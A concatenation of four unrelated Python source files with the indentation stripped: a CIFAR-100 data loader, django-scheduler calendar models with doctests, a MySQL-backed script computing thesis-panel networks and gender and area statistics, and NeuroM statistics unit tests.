h5f = h5py.File(self.save_h5py, 'a')
h5f.create_dataset('train_dataset', data=self.train.data, compression="gzip", compression_opts=9)
print('Written CIFAR 100 train dataset to file: %s' % self.save_h5py)
h5f.close()
del data_coarse_labels
del data_fine_labels
del data_images
del preprocessed_images
if self.make_image is True:
del images
print()
return True
def load_test_data(self, data_directory='/tmp/cifar100/'):
"""
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Test Dataset')
basic_dir_path = data_directory + 'cifar-100-batches/'
test_batch_path = 'test'
test_files = [str(basic_dir_path + test_batch_path)]
print('Unpickling test file: %s' % test_files[0])
test_dict = [file_utils.unpickle(test_files[0])]
data, fine_labels, coarse_labels, _, _ = self.dict_read(test_dict[0])
test_fine_labels = fine_labels
test_coarse_labels = coarse_labels
print('Reading unpicked test file: %s' % test_files[0])
test_images = data
test_images = np.array(test_images)
preprocessed_images = transform(test_images, transform_method=self.preprocess)
if self.make_image is True:
images = []
for fig_num in range(preprocessed_images.shape[0]):
fig = preprocessed_images[fig_num, :]
img = self.convert_images(fig, type=self.image_mode)
images.append(img)
images = np.array(images)
test_fine_labels = np.array(test_fine_labels)
test_coarse_labels = np.array(test_coarse_labels)
self.test.data = np.array(preprocessed_images[:self.num_test_images])
if self.make_image is True:
self.test.images = np.array(images[:self.num_test_images, :])
self.test.fine_labels = np.array(test_fine_labels[:self.num_test_images])
self.test.coarse_labels = np.array(test_coarse_labels[:self.num_test_images])
self.test.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.test.fine_labels)))
self.test.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.test.coarse_labels)))
if self.one_hot_encode is True:
self.convert_one_hot_encoding(self.test.fine_labels, data_type='test', class_type='fine')
self.convert_one_hot_encoding(self.test.coarse_labels, data_type='test', class_type='coarse')
if self.save_h5py != '':
h5f = h5py.File(self.save_h5py, 'a')
h5f.create_dataset('test_dataset', data=self.test.data, compression="gzip", compression_opts=9)
print('Written CIFAR 100 test dataset to file: %s' % self.save_h5py)
h5f.close()
del test_fine_labels
del test_coarse_labels
del test_images
del preprocessed_images
if self.make_image is True:
del images
print()
return True
def load_data(self, train=True, test=True, data_directory='/tmp/cifar100/'):
"""
:param train:
:param test:
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Dataset')
start = time.time()
self.download_and_extract_data(data_directory)
if train is True:
print('Loading %d train images' %self.num_train_images)
if self.train_validate_split is not None:
print('Loading %d validate images' % self.num_validate_images)
self.load_train_data(data_directory=data_directory)
if test is True:
print('Loading %d test images' % self.num_test_images)
self.load_test_data(data_directory=data_directory)
end = time.time()
print('Loaded CIFAR 100 Dataset in %.4f seconds' %(end-start))
return True
|
|
from django.contrib.contenttypes import fields
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import Q
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from schedule.settings import USE_FULLCALENDAR
from schedule.utils import EventListManager
class CalendarManager(models.Manager):
"""
>>> user1 = User(username='tony')
>>> user1.save()
"""
def get_calendar_for_object(self, obj, distinction=""):
"""
This function gets a calendar for an object. It should only return one
calendar. If the object has more than one calendar related to it (or
more than one related to it under a distinction if a distinction is
defined) an AssertionError will be raised. If none are returned it will
raise a DoesNotExistError.
>>> user = User.objects.get(username='tony')
>>> try:
... Calendar.objects.get_calendar_for_object(user)
... except Calendar.DoesNotExist:
... print("failed")
...
failed
Now if we add a calendar it should return the calendar
>>> calendar = Calendar(name='My Cal')
>>> calendar.save()
>>> calendar.create_relation(user)
>>> Calendar.objects.get_calendar_for_object(user)
<Calendar: My Cal>
Now if we add one more calendar it should raise an AssertionError
because there is more than one related to it.
If you would like to get more than one calendar for an object you should
use get_calendars_for_object (see below).
>>> calendar = Calendar(name='My 2nd Cal')
>>> calendar.save()
>>> calendar.create_relation(user)
>>> try:
... Calendar.objects.get_calendar_for_object(user)
... except AssertionError:
... print("failed")
...
failed
"""
calendar_list = self.get_calendars_for_object(obj, distinction)
if len(calendar_list) == 0:
raise Calendar.DoesNotExist("Calendar does not exist.")
elif len(calendar_list) > 1:
raise AssertionError("More than one calendars were found.")
else:
return calendar_list[0]
def get_or_create_calendar_for_object(self, obj, distinction="", name=None):
"""
>>> user = User(username="jeremy")
>>> user.save()
>>> calendar = Calendar.objects.get_or_create_calendar_for_object(user, name = "Jeremy's Calendar")
>>> calendar.name
"Jeremy's Calendar"
"""
try:
return self.get_calendar_for_object(obj, distinction)
except Calendar.DoesNotExist:
if name is None:
calendar = self.model(name=str(obj))
else:
calendar = self.model(name=name)
calendar.slug = slugify(calendar.name)
calendar.save()
calendar.create_relation(obj, distinction)
return calendar
def get_calendars_for_object(self, obj, distinction=""):
"""
This function allows you to get calendars for a specific object
If distinction is set it will filter out any relation that doesnt have
that distinction.
"""
ct = ContentType.objects.get_for_model(obj)
if distinction:
dist_q = Q(calendarrelation__distinction=distinction)
else:
dist_q = Q()
return self.filter(
dist_q,
calendarrelation__content_type=ct,
calendarrelation__object_id=obj.id,
)
class Calendar(models.Model):
"""
This is for grouping events so that batch relations can be made to all
events. An example would be a project calendar.
name: the name of the calendar
events: all the events contained within the calendar.
>>> calendar = Calendar(name = 'Test Calendar')
>>> calendar.save()
>>> data = {
... 'title': 'Recent Event',
... 'start': datetime.datetime(2008, 1, 5, 0, 0),
... 'end': datetime.datetime(2008, 1, 10, 0, 0)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
>>> data = {
... 'title': 'Upcoming Event',
... 'start': datetime.datetime(2008, 1, 1, 0, 0),
... 'end': datetime.datetime(2008, 1, 4, 0, 0)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
>>> data = {
... 'title': 'Current Event',
... 'start': datetime.datetime(2008, 1, 3),
... 'end': datetime.datetime(2008, 1, 6)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
"""
name = models.CharField(_("name"), max_length=200)
slug = models.SlugField(_("slug"), max_length=200, unique=True)
objects = CalendarManager()
class Meta:
verbose_name = _("calendar")
verbose_name_plural = _("calendars")
def __str__(self):
return self.name
@property
def events(self):
return self.event_set
def create_relation(self, obj, distinction="", inheritable=True):
"""
Creates a CalendarRelation between self and obj.
if Inheritable is set to true this relation will cascade to all events
related to this calendar.
"""
CalendarRelation.objects.create_relation(self, obj, distinction, inheritable)
def get_recent(self, amount=5):
"""
This shortcut function allows you to get events that have started
recently.
amount is the amount of events you want in the queryset. The default is
5.
"""
return self.events.order_by("-start").filter(start__lt=timezone.now())[:amount]
def occurrences_after(self, date=None):
return EventListManager(self.events.all()).occurrences_after(date)
def get_absolute_url(self):
if USE_FULLCALENDAR:
return reverse("fullcalendar", kwargs={"calendar_slug": self.slug})
return reverse("calendar_home", kwargs={"calendar_slug": self.slug})
class CalendarRelationManager(models.Manager):
def create_relation(
self, calendar, content_object, distinction="", inheritable=True
):
"""
Creates a relation between calendar and content_object.
See CalendarRelation for help on distinction and inheritable
"""
return CalendarRelation.objects.create(
calendar=calendar, distinction=distinction, content_object=content_object
)
class CalendarRelation(models.Model):
"""
This is for relating data to a Calendar, and possible all of the events for
that calendar, there is also a distinction, so that the same type or kind of
data can be related in different ways. A good example would be, if you have
calendars that are only visible by certain users, you could create a
relation between calendars and users, with the distinction of 'visibility',
or 'ownership'. If inheritable is set to true, all the events for this
calendar will inherit this relation.
calendar: a foreign key relation to a Calendar object.
content_type: a foreign key relation to ContentType of the generic object
object_id: the id of the generic object
content_object: the generic foreign key to the generic object
distinction: a string representing a distinction of the relation, User could
have a 'veiwer' relation and an 'owner' relation for example.
inheritable: a boolean that decides if events of the calendar should also
inherit this relation
DISCLAIMER: while this model is a nice out of the box feature to have, it
may not scale well. If you use this, keep that in mind.
"""
calendar = models.ForeignKey(
Calendar, on_delete=models.CASCADE, verbose_name=_("calendar")
)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.IntegerField(db_index=True)
content_object = fields.GenericForeignKey("content_type", "object_id")
distinction = models.CharField(_("distinction"), max_length=20)
inheritable = models.BooleanField(_("inheritable"), default=True)
objects = CalendarRelationManager()
class Meta:
verbose_name = _("calendar relation")
verbose_name_plural = _("calendar relations")
index_together = [("content_type", "object_id")]
def __str__(self):
return "{} - {}".format(self.calendar, self.content_object)
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 18 11:20:55 2014
@author: aitor
"""
import mysql.connector
from cache import university_locations, university_ids, thesis_ids, name_genders, codes_descriptor, descriptor_codes
import networkx as nx
import sys
import pprint
import json
import os
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
from model.dbconnection import dbconfig
config = dbconfig
#*******************
# SNA
#*******************
def build_panel_relations():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
G = nx.Graph()
for cont, thesis in enumerate(thesis_ids):
if cont%500 == 0:
print 'Creating panel relations network: ' + str(float(cont)/len(thesis_ids) * 100)
query = 'SELECT person.name FROM panel_member, person WHERE panel_member.person_id = person.id AND panel_member.thesis_id =' + str(thesis)
cursor.execute(query)
panel = []
for person in cursor:
panel.append(person[0])
for i, person in enumerate(panel):
source = person
for j in range(i+1, len(panel)):
target = panel[j]
if G.has_edge(source, target):
G.edge[source][target]['weight'] += 1
else:
G.add_edge(source, target, weight = 1)
cursor.close()
print 'Graph created'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
return G
def build_area_relations():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
g_3 = nx.Graph()
g_2 = nx.Graph()
g_1 = nx.Graph()
for cont, thesis in enumerate(thesis_ids):
if cont%500 == 0:
print 'Creating area relations network: ' + str(float(cont)/len(thesis_ids) * 100)
query = 'SELECT descriptor.code FROM descriptor, association_thesis_description WHERE association_thesis_description.descriptor_id = descriptor.id AND association_thesis_description.thesis_id =' + str(thesis)
cursor.execute(query)
descriptors = []
for descriptor in cursor:
descriptors.append(str(descriptor[0]))
for i, descriptor in enumerate(descriptors):
source_3 = codes_descriptor[descriptor]
source_2 = codes_descriptor[descriptor[:4] +'00']
source_1 = codes_descriptor[descriptor[:2] + '0000']
for j in range(i+1, len(descriptors)):
target_3 = codes_descriptor[descriptors[j]]
target_2 = codes_descriptor[descriptors[j][:4] + '00']
target_1 = codes_descriptor[descriptors[j][:2] + '0000']
if g_3.has_edge(source_3, target_3):
g_3.edge[source_3][target_3]['weight'] += 1
else:
g_3.add_edge(source_3, target_3, weight = 1)
if g_2.has_edge(source_2, target_2):
g_2.edge[source_2][target_2]['weight'] += 1
else:
g_2.add_edge(source_2, target_2, weight = 1)
if g_1.has_edge(source_1, target_1):
g_1.edge[source_1][target_1]['weight'] += 1
else:
g_1.add_edge(source_1, target_1, weight = 1)
cursor.close()
print 'Third level'
print '-Nodes:',len(g_3.nodes())
print '-Edges:',len(g_3.edges())
print 'Second level'
print '-Nodes:',len(g_2.nodes())
print '-Edges:',len(g_2.edges())
print 'First level'
print '-Nodes:',len(g_1.nodes())
print '-Edges:',len(g_1.edges())
return g_3, g_2, g_1
#the graph is too big. Nodes with not enough degree are deleted
#If a node has a degree of 4 or less it only has been in the panel of 1 viva
def filter_panel_relations(G, MIN_DEGREE = 5):
print 'Starting graph'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
continue_cleaning = True
while(continue_cleaning):
degrees = G.degree()
total_removed = 0
for d in degrees:
if degrees[d] < MIN_DEGREE:
G.remove_node(d)
total_removed += 1
if total_removed == 0:
continue_cleaning = False
else:
print 'Deleted:', total_removed
print 'Filtered graph'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
#***********************
# Simple statistics
#***********************
def get_university_ids():
cnx = mysql.connector.connect(**config)
cursor_unis = cnx.cursor()
cursor_unis.execute("SELECT id, name FROM university")
result = {}
for university in cursor_unis:
result[university[0]] = university[1]
cursor_unis.close()
return result
def get_number_phd_by_universities():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
result = {}
for key in university_ids.keys():
uni_name = university_ids[key]
query = 'SELECT COUNT(*) FROM thesis WHERE university_id=' + str(key)
cursor.execute(query)
for count in cursor:
result[uni_name] = count[0]
cursor.close()
return result
def create_university_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT university_id, defense_date from thesis'
cursor.execute(query)
results = {2000:{u'DEUSTO':0}}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Universities temporal evolution', i
try:
university = university_ids[thesis[0]]
year = thesis[1].year
if year in results.keys():
unis = results[year]
if university in unis.keys():
unis[university] += 1
else:
unis[university] = 1
else:
results[year] = {university:1}
except AttributeError:
print 'The thesis has no year in the database'
except KeyError:
print 'Unkown university:', thesis[0]
except TypeError:
print 'The thesis has no related university'
cursor.close()
return results
def create_region_temporal_evolution_by_year():
by_university = create_university_temporal_evolution_by_year()
by_region = {}
for year in by_university:
universities = by_university[year]
for uni in universities:
region = university_locations[uni]
total_uni = universities[uni]
if year in by_region.keys():
regions = by_region[year]
if region in regions.keys():
regions[region] += total_uni
else:
regions[region] = total_uni
else:
by_region[year] = {region:total_uni}
return by_region
def create_area_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT id, defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
try:
thesis_id = thesis[0]
year = thesis[1].year
if i%500 == 0:
print 'Unesco code temporal evolution, processing', thesis_id, ', year', year
#get descriptors
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = []
for desc in cursor_desc:
used_descriptors.append(desc[0])
cursor_desc.close()
if year in results.keys():
descs = results[year]
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
if decriptor_text in descs.keys():
descs[decriptor_text] += 1
else:
descs[decriptor_text] = 1
else:
descs = {}
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
descs[decriptor_text] = 1
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
#only uses first level area codes ##0000
def create_meta_area_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT id, defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
try:
thesis_id = thesis[0]
year = thesis[1].year
if i%500 == 0:
print 'First level Unesco code temporal evolution, processing', thesis_id, ', year', year
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = set()
for desc in cursor_desc:
try:
descriptor_text = codes_descriptor[str(desc[0])]
descriptor_code = descriptor_codes[descriptor_text]
first_level_code = descriptor_code[0:2] + '0000'
first_level_descriptor = codes_descriptor[first_level_code]
used_descriptors.add(first_level_descriptor)
except:
print 'No data', descriptor_text
cursor_desc.close()
if year in results.keys():
descs = results[year]
for d in used_descriptors:
if d in descs.keys():
descs[d] += 1
else:
descs[d] = 1
else:
descs = {}
for d in used_descriptors:
descs[d] = 1
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_gender_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.author_id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders temporal evolution', i
try:
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
year = thesis[2].year
if year in results.keys():
genders = results[year]
if gender in genders.keys():
genders[gender] += 1
else:
genders[gender] = 1
else:
results[year] = {gender:1}
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_percentaje_evolution(gender_temp):
result= {}
for year in gender_temp:
try:
total_year = float(gender_temp[year]['female'] + gender_temp[year]['male'])
female_perc = gender_temp[year]['female']/total_year
male_perc = gender_temp[year]['male']/total_year
result[year] = {'female':female_perc, 'male':male_perc}
except:
pass
return result
def create_gender_per_area_evolution():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders per Unesco code temporal evolution', i
try:
#get gender
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
#get descriptors
thesis_id = thesis[1]
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = []
for desc in cursor_desc:
used_descriptors.append(desc[0])
cursor_desc.close()
year = thesis[2].year
if year in results.keys():
descs = results[year]
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
if decriptor_text in descs.keys():
gender_area = descs[decriptor_text]
if gender in gender_area.keys():
gender_area[gender] += 1
else:
gender_area[gender] = 1
else:
descs[decriptor_text] = {gender:1}
else:
descs = {}
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
descs[decriptor_text] = {gender:1}
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_gender_panel_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.id, thesis.defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Thesis panel gender distribution temporal evolution', i
cursor_names = cnx2.cursor()
query_names = 'SELECT person.first_name FROM panel_member, person WHERE person.id = panel_member.person_id AND panel_member.thesis_id=' + str(thesis[0])
cursor_names.execute(query_names)
genders = {'male':0, 'female':0, 'None':0}
for name in cursor_names:
try:
gender = name_genders[name[0]]
except:
gender = 'None'
genders[gender] += 1
cursor_names.close()
try:
year = thesis[1].year
if year in results.keys():
gender_cont = results[year]
for g in genders:
if g in gender_cont.keys():
gender_cont[g] += genders[g]
else:
gender_cont[g] = genders[g]
else:
results[year] = genders
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_advisor_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.id, thesis.defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Thesis advisor gender distribution temporal evolution', i
cursor_names = cnx2.cursor()
query_names = 'SELECT person.first_name FROM advisor, person WHERE person.id = advisor.person_id AND advisor.thesis_id=' + str(thesis[0])
cursor_names.execute(query_names)
genders = {'male':0, 'female':0, 'None':0}
for name in cursor_names:
try:
gender = name_genders[name[0]]
except:
gender = 'None'
genders[gender] += 1
cursor_names.close()
try:
year = thesis[1].year
if year in results.keys():
gender_cont = results[year]
for g in genders:
if g in gender_cont.keys():
gender_cont[g] += genders[g]
else:
gender_cont[g] = genders[g]
else:
results[year] = genders
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_meta_area_evolution():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders per first level Unesco code temporal evolution', i
try:
#get gender
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
#get descriptors
thesis_id = thesis[1]
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = set()
for desc in cursor_desc:
try:
descriptor_text = codes_descriptor[str(desc[0])]
descriptor_code = descriptor_codes[descriptor_text]
first_level_code = descriptor_code[0:2] + '0000'
first_level_descriptor = codes_descriptor[first_level_code]
used_descriptors.add(first_level_descriptor)
except TypeError:
print 'Thesis has no unesco codes'
cursor_desc.close()
year = thesis[2].year
if year in results.keys():
descs = results[year]
for decriptor_text in used_descriptors:
if decriptor_text in descs.keys():
gender_area = descs[decriptor_text]
if gender in gender_area.keys():
gender_area[gender] += 1
else:
gender_area[gender] = 1
else:
descs[decriptor_text] = {gender:1}
else:
descs = {}
for decriptor_text in used_descriptors:
descs[decriptor_text] = {gender:1}
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_month_distribution():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.defense_date FROM thesis'
cursor.execute(query)
results = {}
for i, date in enumerate(cursor):
if i%500 == 0:
print 'Month distribution', i
try:
month = date[0].month
except AttributeError:
print 'Thesis has no date'
if month in results.keys():
results[month] += 1
else:
results[month] = 1
cursor.close()
return results
def create_university_areas():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = '''SELECT thesis.defense_date, university.name, descriptor.code
FROM thesis, university, descriptor, association_thesis_description
WHERE thesis.id = association_thesis_description.thesis_id
AND association_thesis_description.descriptor_id = descriptor.id
AND thesis.university_id = university.id'''
cursor.execute(query)
results_by_uni = {} #{DEUSTO:{'2000':{'INFORMATICA':1}}}
results_by_code = {} #{INFORMATICA:{'2000':{'DEUSTO':1}}}
for i, info in enumerate(cursor):
if i%500 == 0:
print 'University areas', i
try:
year = info[0].year
university = info[1]
code = str(info[2])[:4] + '00'
code = codes_descriptor[code]
except AttributeError:
print 'Thesis has no date'
if university in results_by_uni.keys():
years = results_by_uni[university]
if year in years.keys():
codes = years[year]
if code in codes.keys():
codes[code] += 1
else:
codes[code] = 1
else:
years[year] = {code:1}
else:
results_by_uni[university] = {year:{code:1}}
if code in results_by_code.keys():
years = results_by_code[code]
if year in years.keys():
universities = years[year]
if university in universities.keys():
universities[university] += 1
else:
universities[university] = 1
else:
years[year] = {university:1}
else:
results_by_code[code] = {year:{university:1}}
cursor.close()
return results_by_uni, results_by_code
if __name__=='__main__':
print 'Calculating statistics and graphs'
pp = pprint.PrettyPrinter(indent=4)
# #create the thesis panel social network
# G = build_panel_relations()
# filter_panel_relations(G)
# print 'Writing file'
# nx.write_gexf(G, '../website/static/data/panel_relations_filtered.gexf')
#
# #create the social network for the thematic areas
# g_3, g_2, g_1 = build_area_relations()
# print 'Writing files'
# nx.write_gexf(g_3, '../website/static/data/3_level_unesco_relations.gexf')
# nx.write_gexf(g_2, '../website/static/data/2_level_unesco_relations.gexf')
# nx.write_gexf(g_1, '../website/static/data/1_level_unesco_relations.gexf')
# #Create the temporal evolution of the universities
# print 'Temporal evolution of the universities'
# unis = create_university_temporal_evolution_by_year()
# pp.pprint(unis)
# json.dump(unis, open('../website/static/data/universities_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the geoprahpical regions
# print 'Temporal evolution of the geoprahpical regions'
# regions = create_region_temporal_evolution_by_year()
# pp.pprint(regions)
# json.dump(regions, open('../website/static/data/regions_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the knowledge areas
# print 'Temporal evolution of the knowledge areas'
# areas = create_area_temporal_evolution_by_year()
# pp.pprint(areas)
# json.dump(areas, open('../website/static/data/areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the author genders
# print 'Temporal evolution of the author genders'
# genders_total = create_gender_temporal_evolution_by_year()
# pp.pprint(genders_total)
# json.dump(genders_total, open('../website/static/data/genders_total.json', 'w'), indent = 4)
#
# #Create the temporal evolution of gender percentage
# print 'Temporal evolution of gender percentage'
# genders_percentage = create_gender_percentaje_evolution(genders_total)
# pp.pprint(genders_percentage)
# json.dump(genders_percentage, open('../website/static/data/genders_percentage.json', 'w'), indent = 4)
#
# #create the temporal evolution of gender per area
# print 'Temporal evolution of gender percentage per area'
# genders_area_total = create_gender_per_area_evolution()
# pp.pprint(genders_area_total)
# json.dump(genders_area_total, open('../website/static/data/genders_area_total.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the primary knowledge areas
# print 'Temporal evolution of the knowledge areas'
# primary_areas = create_meta_area_temporal_evolution_by_year()
# pp.pprint(primary_areas)
# json.dump(primary_areas, open('../website/static/data/first_level_areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of panel members' gender
# print 'Temporal evolution of the panel members\' gender areas'
# panel_gender = create_gender_panel_evolution_by_year()
# pp.pprint(panel_gender)
# json.dump(panel_gender, open('../website/static/data/gender_panel_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the genders in first level areas
# print 'Temporal evolution of the student genders by first level area'
# meta_area_gender = create_gender_meta_area_evolution()
# pp.pprint(meta_area_gender)
# json.dump(meta_area_gender, open('../website/static/data/gender_first_level_areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the genders of the thesis advisors
# print 'Temporal evolution of the advisors genders'
# advisor_gender = create_gender_advisor_evolution_by_year()
# pp.pprint(advisor_gender)
# json.dump(advisor_gender, open('../website/static/data/advisor_gender.json', 'w'), indent = 4)
#
# #create month distribution
# print 'Month distribution'
# month_distribution = create_month_distribution()
# pp.pprint(month_distribution)
# json.dump(month_distribution, open('../website/static/data/month_distribution.json', 'w'), indent = 4)
#
#create second level area temporal evolution per university and year
print 'Area temporal evolution per university and year'
results_by_uni, results_by_code = create_university_areas()
pp.pprint(results_by_uni)
json.dump(results_by_uni, open('../website/static/data/university_area_year_by_uni.json', 'w'), indent = 4)
pp.pprint(results_by_code)
json.dump(results_by_code, open('../website/static/data/university_area_year_by_code.json', 'w'), indent = 4)
print '********** DONE *************'
|
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Test neurom.stats
Since the stats module consists of simple wrappers to scipy.stats functions,
these tests are only sanity checks.
'''
from neurom import stats as st
from nose import tools as nt
import numpy as np
import random
np.random.seed(42)
NORMAL_MU = 10.
NORMAL_SIGMA = 1.0
NORMAL = np.random.normal(NORMAL_MU, NORMAL_SIGMA, 1000)
EXPON_LAMBDA = 10.
EXPON = np.random.exponential(EXPON_LAMBDA, 1000)
UNIFORM_MIN = -1.
UNIFORM_MAX = 1.
UNIFORM = np.random.uniform(UNIFORM_MIN, UNIFORM_MAX, 1000)
def test_fit_normal_params():
fit_ = st.fit(NORMAL, 'norm')
nt.assert_almost_equal(fit_.params[0], NORMAL_MU, 1)
nt.assert_almost_equal(fit_.params[1], NORMAL_SIGMA, 1)
def test_fit_normal_dict():
fit_ = st.fit(NORMAL, 'norm')
d = st.fit_results_to_dict(fit_, min_bound=-123, max_bound=123)
nt.assert_almost_equal(d['mu'], NORMAL_MU, 1)
nt.assert_almost_equal(d['sigma'], NORMAL_SIGMA, 1)
nt.assert_almost_equal(d['min'], -123, 1)
nt.assert_almost_equal(d['max'], 123, 1)
def test_fit_normal_regression():
fit_ = st.fit(NORMAL, 'norm')
nt.assert_almost_equal(fit_.params[0], 10.019332055822, 12)
nt.assert_almost_equal(fit_.params[1], 0.978726207747, 12)
nt.assert_almost_equal(fit_.errs[0], 0.021479979161, 12)
